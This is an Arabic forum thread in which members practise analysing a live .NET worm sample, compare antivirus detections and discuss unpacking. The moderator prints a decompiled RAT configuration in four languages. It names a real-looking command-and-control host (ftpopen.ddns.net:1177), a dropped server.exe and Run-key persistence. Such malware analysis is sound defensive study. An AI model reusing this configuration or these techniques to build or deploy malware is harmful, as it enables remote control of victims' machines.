مـلـغـوم عينه بتاريخ 31/8/2017

الموضوع في 'منتدى نقاشات واختبارات برامج الحماية' بواسطة black007, بتاريخ ‏أغسطس 31, 2017.

حالة الموضوع:
مغلق
  1. black007

    black007 مراقب عام (خبير فحص ملفات) طاقم الإدارة فريق فحص زيزووم للحماية نجم الشهر المراقب العام المميز

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,093
    الإعجابات المتلقاة:
    21,879
    نقاط الجائزة:
    1,345
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7


    بسم الله الرحمن الرحيم

    السلام عليكم ورحمه الله وبركاته

    بعيد عن الدورس النظريه التى احياننا يتم قراتها ومن ثم يتم تجاهلها

    فضلت وضع عينه حقيقيه للتحليل وذلك لان التمارين العمليه اهم بكثير من الدروس النظريه

    لذلك وجب الحذر اثناء تحليل العينه

    ملاحظه مهمه هذه العينه خطيره جدا ويجب الانتباه اثناء التحليل

    نصائح اتبعها

    استخدم هذه البرامج اذا اردت تحليل العينه بالطريقه الديناميكيه

    برامج البيئة الوهمية " الانظمة الوهمية "
    VirtualBox او VMware

    برامج تجميد النظام
    Deep Freeze او Shadow Defender

    برامج معرفة نوع الضغط
    Detect It Easy او Exeinfo PE او PEiD او RDG Packer Detctor

    برامج مراقبة الإتصالات
    NetSinfferCs او apate DNS او Cport

    برامج مراقب العمليات و مسارات النزول
    Process xp او Process Hacker
    Spy The Spy

    لتحميل العينه

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    ملحوظه مهمه : العينه للتدرب على الفحص واستخراج البيانات + يمكن تجربه برامج الحمايه

    ساحاول مساعده كل من يحاول ولم يستطيع الوصول للبيانات

    شرح الفك اليدوى للعينه

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    بالتوفيق للجميع
     
    osama101 ،أبو رمش ،ALI 145 و 11آخرون معجبون بهذا.
  2. النوميدي

    النوميدي مشرف قسم الحماية وقسم الجوال طاقم الإدارة فريق الدعم لقسم الحماية نجم الشهر المشرف المميز

    إنضم إلينا في:
    ‏فبراير 18, 2017
    المشاركات:
    3,771
    الإعجابات المتلقاة:
    6,349
    نقاط الجائزة:
    1,340
    الإقامة:
    أرض الله
    برامج الحماية:
    TrustPort
    نظام التشغيل:
    Windows 10
    أولا البرامج ......:222D

    ماكفي لم يعثر على شيء لا بالفحص و لا التشغيل ... عسل في عسل

    [​IMG]

    الثاني Drweb

    حذف العينة بمجرد فك الضغط ..... جميل 222:)

    [​IMG]
     
  3. padova

    padova زيزوومي محترف

    إنضم إلينا في:
    ‏أكتوبر 28, 2013
    المشاركات:
    451
    الإعجابات المتلقاة:
    2,300
    نقاط الجائزة:
    770
    الإقامة:
    italia
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows8.1
    وعليكم السلام ورحمة الله وبركاته عيدكم مبارك وكل عام وأنتم بألف خير
    الكاسبر عند فك الضغط

    2017-08-31 at 21-31-11.png
     
  4. wikihow

    wikihow akramstar فريق الدعم لقسم الحماية نجم الشهر

    إنضم إلينا في:
    ‏يوليو 6, 2013
    المشاركات:
    618
    الإعجابات المتلقاة:
    1,092
    نقاط الجائزة:
    1,020
    برامج الحماية:
    COMODO
    نظام التشغيل:
    Windows 10
    windows defender
    windows Defender.PNG
     
  5. MagicianMiDo32

    MagicianMiDo32 زيزوومي VIP

    إنضم إلينا في:
    ‏ابريل 29, 2012
    المشاركات:
    8,490
    الإعجابات المتلقاة:
    25,429
    نقاط الجائزة:
    1,220
    الإقامة:
    عندي كهف ساكن فيه
    برامج الحماية:
    TrustPort
    نظام التشغيل:
    Linux
    هوب هوب هوب هوب :222D هنمزج النهادرة
    أنتو شكلكو بتحبوني والله (222y):222love:
     
    black007 ،أبو رمش ،النوميدي و 3آخرون معجبون بهذا.
  6. MagicianMiDo32

    MagicianMiDo32 زيزوومي VIP

    إنضم إلينا في:
    ‏ابريل 29, 2012
    المشاركات:
    8,490
    الإعجابات المتلقاة:
    25,429
    نقاط الجائزة:
    1,220
    الإقامة:
    عندي كهف ساكن فيه
    برامج الحماية:
    TrustPort
    نظام التشغيل:
    Linux
    الحماية رزلة

    بس الملف ساعة الـ Debug بيعمل زي بتاع Sub7 كدا يقعد ينسخ عمليات ويقتلها ويشغل نفسه ويقتل نفسه كدا
     
    padova ،أبو رمش ،النوميدي و 2آخرون معجبون بهذا.
  7. MagicianMiDo32

    MagicianMiDo32 زيزوومي VIP

    إنضم إلينا في:
    ‏ابريل 29, 2012
    المشاركات:
    8,490
    الإعجابات المتلقاة:
    25,429
    نقاط الجائزة:
    1,220
    الإقامة:
    عندي كهف ساكن فيه
    برامج الحماية:
    TrustPort
    نظام التشغيل:
    Linux
    لقيت الملف فيه اتصال عادي مفيهوش سيرفر
    بس بيدي نيتف على الـ MegaDumper

    ايه البتاع دا يا درش
    mngfd.PNG

    كيلوجر صح ؟
     
    padova ،black007 ،النوميدي و 3آخرون معجبون بهذا.
  8. vallecano

    vallecano زيزوومي جديد

    إنضم إلينا في:
    ‏مايو 30, 2017
    المشاركات:
    44
    الإعجابات المتلقاة:
    107
    نقاط الجائزة:
    70
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    السلام عليكم

    [​IMG]
    [​IMG]
    [​IMG]
    [​IMG]
    [​IMG]

    هل هذا هو المطلوب
     
  9. فتى محاسن

    فتى محاسن زيزوومي مميز الأعضاء النشطين لهذا الشهر

    إنضم إلينا في:
    ‏يناير 2, 2010
    المشاركات:
    251
    الإعجابات المتلقاة:
    582
    نقاط الجائزة:
    530
    الإقامة:
    المملكة العربية السعودية
    برامج الحماية:
    ESET
    نظام التشغيل:
    Windows 10
    eset internet security 10

    بعد فك العينة تم حذفها بالكامل

    1.png
     
  10. black007

    black007 مراقب عام (خبير فحص ملفات) طاقم الإدارة فريق فحص زيزووم للحماية نجم الشهر المراقب العام المميز

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,093
    الإعجابات المتلقاة:
    21,879
    نقاط الجائزة:
    1,345
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    نتيجه ممتازه للوصول الى البيانات

    الملف عباره عن دوده ولكنها معدله حسب ما طلعت عليها

    وفى المشاركه فى الاسفل

    كما اوضح الاخ vallecano سلوكياتها الملف انها عباره عن دوده انتشاء معدله بشكل ما

    نتائج جيده منك اخى

    ارى انك بدات ان تعتاد على عينات net.

    ما اوضحته فى الصور فى الاعلى هى سلوكيات الملف وليسه بياناته

    ولكن لا يهم بما انك اكتشفت سلوكيات الملف فيمكن استنتاج انه دوده انتشار

    ومعدل عليها بشكل ما لان فى الدوال التى اوضحتها هى تشغيل ملف من رابط التعديل على ملف الهوست وغيرها من السلوكيات الاخرى

    ------

    طريقه الفك للحابب التجربه واستخراج البيانات ( البانات داخليه 127.0.0.1 )

    يمكن استخدام المنقح dnSpy كما فعل الغالى ميدو ووضع نقاط توقف على دوال الاستدعاء وستصل الى الملف

    او يمكن استخدام fulldump للحصول على الملف خام وقرائه اكواده

    ولكن ستواجهكم حمايه على الملف عليكم التخلص منها باداه d4dot باصدارتها المعدله

    بالتوفيق للشباب

    وكل عام وانت بالف خير
     
  11. vallecano

    vallecano زيزوومي جديد

    إنضم إلينا في:
    ‏مايو 30, 2017
    المشاركات:
    44
    الإعجابات المتلقاة:
    107
    نقاط الجائزة:
    70
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    وعليكم السلام أخي
    سبب عدم اهتمامي بالدوت نت راجع لحقبة سابقة في كسر البرامج فكلما مررت على برنامج من هذه البرمجة تركته وتعمقت كثيرا في الناتيف
    ولم أهنم الا الان و في تحليل العينات فقط لان معظم الملغمين يلغمون بالدون نت على ما ألاحظ
    بخصوص البيانات فان كنت تقصد الأبي الافتراضي للجهاز كما استخرج الأخ ميدو

    احدى الصور في الأعلى تظهر الابي الافتراضي للجهاز يبدو أنك لم تلاحظها

    [​IMG]

    127.0.0.1​
     
  12. black007

    black007 مراقب عام (خبير فحص ملفات) طاقم الإدارة فريق فحص زيزووم للحماية نجم الشهر المراقب العام المميز

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,093
    الإعجابات المتلقاة:
    21,879
    نقاط الجائزة:
    1,345
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    هناك فرق بين ما ذكرت وبين ان الملف يتصل على 127.0.0.1

    فالصوره الى حضرتك وضعتها هى جزء من التعديل على ملف الهوست

    حيث ان الملف من ضمن خواصه يمكنه التعديل على ملف الهوست ووضع اى رابط او بمعنى ادق حجب اى رابط بالتعديل على ملف الهوست ووضعه تحت الاى بى 127.0.0.1

    حتى يتم اعاده توجيه الى الموقع الى الاى بى الادخلى 127.0.0.1 ويتم الحجب

    ما ذكرته بالبيانات هى ان عينات الدوت نت وخصوصا الديدان او برامج الرات او غيرها من البرامج الاخرى المبرمجه بالدوت نت تعتمد على مكتبه مهم جدا فى net framework

    وهو مكتبه Mono.Cecil

    حيث يتم تجميع البيانات دائما فى البرامج من هذا النوع على هذا الشكل

    [​IMG]

    لذلك يكون البورت والهوست وجميع معلومات الملف تكون تحت هذه الداله

    وليس كما ذكرت

    شكرا لك على المتابعه الجيده واتمنى ان نتواصل معا اكثر لتبادل الخبرات

    تحياتى وتقديرى
     
  13. النوميدي

    النوميدي مشرف قسم الحماية وقسم الجوال طاقم الإدارة فريق الدعم لقسم الحماية نجم الشهر المشرف المميز

    إنضم إلينا في:
    ‏فبراير 18, 2017
    المشاركات:
    3,771
    الإعجابات المتلقاة:
    6,349
    نقاط الجائزة:
    1,340
    الإقامة:
    أرض الله
    برامج الحماية:
    TrustPort
    نظام التشغيل:
    Windows 10
    أخي مصطفى ما شاء الله عليك .. دوما تأتي بالمفيد
    لو تكرمت هل يمكنك وضع شرح بالفيديو الى طريقة تحليل العينة
    لتكون لنا نظرة احترافية للطريقة و لنتقدم أحسن في تعلم مثل هده التحليلات
    موفق دوما يا طيب ..
     
  14. black007

    black007 مراقب عام (خبير فحص ملفات) طاقم الإدارة فريق فحص زيزووم للحماية نجم الشهر المراقب العام المميز

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,093
    الإعجابات المتلقاة:
    21,879
    نقاط الجائزة:
    1,345
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    اهلا بصديقى العزيز سليم

    للاسف شرح الفديو لن يفيد كثيرا

    خصوصا انه سنطبق على هذا الملف فقط ولا يمكن الاستفاده منه فى ملفات اخرى

    حيث ان لكل ملف تختلف طريقته عن الاخر

    طريقه ميدو تحديدا فى استخراج البيانات تحتاج الى بعض الاحترافيه قليلا للتعامل مع دوال الملف

    كل ما عليك فعله هو البحث جيدا اين يبدا استدعاء الملف وتضع نقاط توقف عندها

    وكما ذكرت تنطبق فقط على هذا الملف لان كل ملف وله طريقته فى الفك

    فى مجال تحليل الملفات الخبيثه وخلينى لا اعمم وساذكر فقط على ملفات الدوت نت توقع اى شى مما يصنع الملف

    فلا يمكن دائما تنفيذ نفس الطريقه المتبعه فى التحليل على كل ملفات الدوت نت لانها تختلف باختالاف صانعها

    اهم شى يكون عندك الاساسيات وتفكر مثلما يفكر برنامج الحمايه كيف ذلك ؟؟!!

    برامج الحمايه تستخدم خوارزميات تقوم بالكشف على الدوال المختلفه للملف وتحدد سلوكه من الدوال والمكتبات التى يستدعيها

    لذلك عليك انت ايضا ان تقوم بذلك بالنظر الى الدوال التى يسدعيها الملف

    جميع الدوال التى تبحث عنها ساذكر لك بعضها

    CreateProcess
    CreateRemoteThread
    DllInstall
    DllRegisterServer
    FindResource
    FindWindow
    GetTempPath
    GetThreadContext
    InternetReadFile
    InternetWriteFile

    وغيرها الكثير والكثير من الدوال ربما ستاخذ من صفحه كامله لكى اكتبها

    قبل كل ذلك عليك ان تكون عندك درايه لا باس بها باللغه التى انت بصدد التحليل بها

    فاغلب منقحات الدوت نت تتيح لك قرائه وترجمه الاكواد الى

    IL اللغه الوسيطه / C# نفس اسلوب الدوت نت / F# لغه غير مشهور كثيره وليس لها شعبيه تقريبا / .net وهى ما بصدد امامننا الان

    للعلم اغلب الدوال واحده فى كل اللغات السابقه الفكره تكمن كيف تبحث عن تلك الداله او كيف تكتب من كل لغه الى اخرى

    ساعطيك مثال وانظر الى الكو باختلاف اللغات مع بعضها

    لاحظ معى

    .net

    كود PHP:
    Shared Sub New()
        
    OK.VN "SGFjS2Vk"
        
    OK.VR "0.7d"
        
    OK.MT Nothing
        OK
    .EXE "server.exe"
        
    OK.DR "TEMP"
        
    OK.RG "7c41d980159a97120250370cc1bfa2ad"
        
    OK."ftpopen.ddns.net"
        
    OK."1177"
        
    OK."|'|'|"
        
    OK.BD Conversions.ToBoolean("False")
        
    OK.Idr Conversions.ToBoolean("False")
        
    OK.IsF Conversions.ToBoolean("False")
        
    OK.Isu Conversions.ToBoolean("False")
        
    OK.LO = New FileInfo(Assembly.GetEntryAssembly.Location)
        
    OK.= New Computer
        OK
    .kq Nothing
        OK
    .Cn False
        OK
    .sf "Software\Microsoft\Windows\CurrentVersion\Run"
        
    OK.Nothing
        OK
    .MeM = New MemoryStream
        OK
    .= New Byte(&H1401  1) {}
        
    OK.lastcap ""
        
    OK.PLG Nothing
    End Sub

     
    C#

    كود PHP:
    static OK()
    {
        
    VN "SGFjS2Vk";
        
    VR "0.7d";
        
    MT null;
        
    EXE "server.exe";
        
    DR "TEMP";
        
    RG "7c41d980159a97120250370cc1bfa2ad";
        
    "ftpopen.ddns.net";
        
    "1177";
        
    "|'|'|";
        
    BD Conversions.ToBoolean("False");
        
    Idr Conversions.ToBoolean("False");
        
    IsF Conversions.ToBoolean("False");
        
    Isu Conversions.ToBoolean("False");
        
    LO = new FileInfo(Assembly.GetEntryAssembly().Location);
        
    = new Computer();
        
    kq null;
        
    Cn false;
        
    sf = @"Software\Microsoft\Windows\CurrentVersion\Run";
        
    null;
        
    MeM = new MemoryStream();
        
    = new byte[0x1401];
        
    lastcap "";
        
    PLG null;
    }
    IL

    كود PHP:
    .method private specialname rtspecialname static void .cctor() cil managed
    {
        .
    maxstack 1
        L_0000
    ldstr "SGFjS2Vk"
        
    L_0005stsfld string j.OK::VN
        L_000a
    ldstr "0.7d"
        
    L_000fstsfld string j.OK::VR
        L_0014
    ldnull
        L_0015
    stsfld object j.OK::MT
        L_001a
    ldstr "server.exe"
        
    L_001fstsfld string j.OK::EXE
        L_0024
    ldstr "TEMP"
        
    L_0029stsfld string j.OK::DR
        L_002e
    ldstr "7c41d980159a97120250370cc1bfa2ad"
        
    L_0033stsfld string j.OK::RG
        L_0038
    ldstr "ftpopen.ddns.net"
        
    L_003dstsfld string j.OK::H
        L_0042
    ldstr "1177"
        
    L_0047stsfld string j.OK::P
        L_004c
    ldstr "|\'|\'|"
        
    L_0051stsfld string j.OK::Y
        L_0056
    ldstr "False"
        
    L_005bcall bool [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(string)
        
    L_0060stsfld bool j.OK::BD
        L_0065
    ldstr "False"
        
    L_006acall bool [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(string)
        
    L_006fstsfld bool j.OK::Idr
        L_0074
    ldstr "False"
        
    L_0079call bool [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(string)
        
    L_007estsfld bool j.OK::IsF
        L_0083
    ldstr "False"
        
    L_0088call bool [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(string)
        
    L_008dstsfld bool j.OK::Isu
        L_0092
    call class [mscorlib]System.Reflection.Assembly [mscorlib]System.Reflection.Assembly::GetEntryAssembly()
        
    L_0097callvirt instance string [mscorlib]System.Reflection.Assembly::get_Location()
        
    L_009cnewobj instance void [mscorlib]System.IO.FileInfo::.ctor(string)
        
    L_00a1stsfld class [mscorlib]System.IO.FileInfo j.OK::LO
        L_00a6
    newobj instance void [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer::.ctor()
        
    L_00abstsfld class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer j.OK::F
        L_00b0
    ldnull
        L_00b1
    stsfld class j.kl j.OK::kq
        L_00b6
    ldc.i4.0
        L_00b7
    stsfld bool j.OK::Cn
        L_00bc
    ldstr "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
        
    L_00c1stsfld string j.OK::sf
        L_00c6
    ldnull
        L_00c7
    stsfld class [System]System.Net.Sockets.TcpClient j.OK::C
        L_00cc
    newobj instance void [mscorlib]System.IO.MemoryStream::.ctor()
        
    L_00d1stsfld class [mscorlib]System.IO.MemoryStream j.OK::MeM
        L_00d6
    ldc.i4 0x1401
        L_00db
    newarr uint8
        L_00e0
    stsfld uint8[] j.OK::b
        L_00e5
    ldstr ""
        
    L_00eastsfld string j.OK::lastcap
        L_00ef
    ldnull
        L_00f0
    stsfld object j.OK::PLG
        L_00f5
    ret
    }

    C++

    كود PHP:
    static OK()
    {
        
    OK::VN S"SGFjS2Vk";
        
    OK::VR S"0.7d";
        
    OK::MT 0;
        
    OK::EXE S"server.exe";
        
    OK::DR S"TEMP";
        
    OK::RG S"7c41d980159a97120250370cc1bfa2ad";
        
    OK::S"ftpopen.ddns.net";
        
    OK::S"1177";
        
    OK::S"|\'|\'|";
        
    OK::BD Conversions::ToBoolean(S"False");
        
    OK::Idr Conversions::ToBoolean(S"False");
        
    OK::IsF Conversions::ToBoolean(S"False");
        
    OK::Isu Conversions::ToBoolean(S"False");
        
    OK::LO __gc new FileInfo(Assembly::GetEntryAssembly()->Location);
        
    OK::__gc new Computer();
        
    OK::kq 0;
        
    OK::Cn false;
        
    OK::sf S"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
        
    OK::0;
        
    OK::MeM __gc new MemoryStream();
        
    OK::__gc new Byte __gc*[0x1401];
        
    OK::lastcap S"";
        
    OK::PLG 0;
    }
     
     
    لاحظ كيف تم كتابه الكود فى كل لغه مختلفه

    كنت حابب اعطيك مثال اوضح لكن ليس هناك اوضح من ذلك لانها حاله عمليه

    انت تبحث دائما عن داله استدعاء ونص من نوع String لذلك يجب ان تركز دائما على الدوال التى تبحث عنها وماذا تحتاج

    فالملفات الخبيثه تمتلك سلوكيات معروفه ولها دوال محدده تستخدمها

    ----

    طريقه الفك الاخرى بعمل fulldump اظنها لا تحتاج شرح ايضا لان كل ما عليك فعله هو تشغيل الملف فى الوضع الحقيقى runtime واستخدام اداه MegaDumper

    او اى اداه مشابها لها وسخرج لك الملف خام ولكن فكره الملف هذه مختلفه قليلا حيث ان من صنع الملف لم يترك البيانات مكشوفه وانما وضع عليها حمايه معززه

    لذلك ستستعين باداه d4dot لازاله الحمايه الى على الملف

    -----

    للعلم التحليل الاستاتيكى اصعب اكثر بكثير من التحليل الديناميكى لانك ستحتاج الى ان تفهم كيف تعمل بنيه الملف

    تعمق اكثر بالقرائه عن بنيه الملف PE ولا تنسى التركيز على لغه برمجيه لانها ستفيدك بشكل كبير جدا

    بالتوفيق
     
  15. النوميدي

    النوميدي مشرف قسم الحماية وقسم الجوال طاقم الإدارة فريق الدعم لقسم الحماية نجم الشهر المشرف المميز

    إنضم إلينا في:
    ‏فبراير 18, 2017
    المشاركات:
    3,771
    الإعجابات المتلقاة:
    6,349
    نقاط الجائزة:
    1,340
    الإقامة:
    أرض الله
    برامج الحماية:
    TrustPort
    نظام التشغيل:
    Windows 10
    ما شاء الله على الرد الوافي ... في بعض الأحيان أكاد أضع المواضيع في المفضلة لوجود ردردك المميزة و التي تضيف محتوى رائع
    و ان شاء الله بدأت في .Net منذ يومين و تطرقت الى Visual basic و بدأت في المتغيرات ...
    في الحقيقة أنا لدى نظرة عن البرمجة لكن لكل ما هو ويب ،فمجال ال Application لم أتطرق له من قبل
    و حسب دروسي الأولية أرها سهلة قليلا بالمقارنة بال Python مثلا
    قدرنا الله للتعلم دوما بالخصوص بالاحتكاك مع خيرة الأعضاء في زيزوم
    تقبل ودي و تقديري أخي مصطفي ...
     
    أعجب بهذه المشاركة black007
  16. black007

    black007 مراقب عام (خبير فحص ملفات) طاقم الإدارة فريق فحص زيزووم للحماية نجم الشهر المراقب العام المميز

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,093
    الإعجابات المتلقاة:
    21,879
    نقاط الجائزة:
    1,345
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    اخجلتنى بكلمك هذا صديق العزيز سليم

    انا لست خبير كما تظن ومازلت اتعلم الكثير والكثير

    فقد يصادفنى احياننا بعض الاشياء التى لم افهمها ولكن احاول معها تكرار

    دائما تذكر بالمثابره كل شى سيهون باذن الله

    وكن على يقن ان الله منحنا العقل لكى تفكر بيه ولكى ستفيد منه فاجعل ذلك فى الخير ولا تحاول استخدامه فى ايزاء احد

    نحمد الله دائما على ما منحنا اياه من تفكير وقدره على فهم الاشياء

    لكل كل الود والحب صديقى سليم
     
    أعجب بهذه المشاركة النوميدي
  17. vallecano

    vallecano زيزوومي جديد

    إنضم إلينا في:
    ‏مايو 30, 2017
    المشاركات:
    44
    الإعجابات المتلقاة:
    107
    نقاط الجائزة:
    70
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    فحصت العينة فحصا دقيقا فلم أجد ما تقدمت به من بيانات
    قلت بالحرف ان كنت تقصد بالبيانات التي استخرجها الأخ ميدو و ما رأيت في صورة الأخ ميدو الا الابي الافتراضي و ما يوجد في الصورة التي وضعتها أنت شيء أخر مختلف تماما عن التي استخرجها الأخ ميدو
    لذلك قلت ان كنت تقصد تلك البيانات و لم اقل انا استخرجت البيانات الصحيحة لاني مقتنع تماما أن الابي الافتراضي ليس كافيا وليس بالبيانات أصلا بل يجب أن نستخرج بيانات أخرى كما تفضلت بها في ردك الأخير
    أنا أيضا أضم صوتي الى صوت الأخ نوميدي و أطلب منك أن تحلل بالفيديو طريقة استخراج تلك البيانات من تلك العينة التي وضعتها للأعضاء حتى يستفيد الجميع
    بمعنى فك الضغط وفك تشفير النصوص و استخراج البايانت التي في الصورة أو طريق التتبع عبر وضع نقاط التوقف ان كان بالامكان
     
  18. black007

    black007 مراقب عام (خبير فحص ملفات) طاقم الإدارة فريق فحص زيزووم للحماية نجم الشهر المراقب العام المميز

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,093
    الإعجابات المتلقاة:
    21,879
    نقاط الجائزة:
    1,345
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    ربما حدث لديك لبث ما فى الموضوع

    او اننى لم اشرح لك الموضوع بشكل جيد

    البيانات صحيحه كما ذكر ميدو وما احببت ان اوضحه لك

    ان الصور التى وضعتها فى الاعلى هى فقط للتوضيح ان البيانات يتم تجميعها كلها فى مكان واحد باستخدام مكتبه Mono.Cecil وهو ما اشرت له فى الصوره فى الاعلى

    انما البيانات المرفقه ليست لهذا الملف ولكن لملف اخر

    ارجو ان تكون فهمت ما اقصد
     
    vallecano و غفاري عماد الدين معجبون بهذا.
  19. black007

    black007 مراقب عام (خبير فحص ملفات) طاقم الإدارة فريق فحص زيزووم للحماية نجم الشهر المراقب العام المميز

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,093
    الإعجابات المتلقاة:
    21,879
    نقاط الجائزة:
    1,345
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    تفضل اخى الغالى شرح الفديو لاستخراج البيانات بالكامل وفك تشفير الاسترنج

    الشرح لك ولجميع من يريد ان يستفيد بما انك اصريت عليه

    وكما ذكرت لصديقى العزيز سليم ان هذا الشرح ينطبق على هذا الملف فقط فى الطريقه والاسلوب المتبع

    فلكل ملف وله طريقته فالفك

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    اعتزر انى لم انشر الفديو فى وقتها + حجم الفديو كبير قليلا

    فلدى بعض المشاغل

    تحياتى وتقديرى
     
    padova ،vallecano و abrahim2014 معجبون بهذا.
  20. vallecano

    vallecano زيزوومي جديد

    إنضم إلينا في:
    ‏مايو 30, 2017
    المشاركات:
    44
    الإعجابات المتلقاة:
    107
    نقاط الجائزة:
    70
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    هههه
    لم أصر بل طالبت كما طالب الأخ نوميدي لاني اعتقدت أو وقع لي لبس حول الموضوع كما تفضلت به حول النتائج الأخيرة التي طرحتها لهذا طالبت منك وضع شرح
    لأن لا فائدة من طرح هكذا مواضيع دون الاستفادة من الحلول بالنسبة للأعضاء الذين لم يصلوا الى نتيجة
    لان وضع النتائج النهائية دون الكيفية بالنسبة لي أعتبرها استعراض عضلات فقط
    و حشى لله أن نستعرض عضلاتنا
    جاري مشاهدة الفيديو وشكرا لك
    أتعبناك​
     
    black007 و النوميدي معجبون بهذا.
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...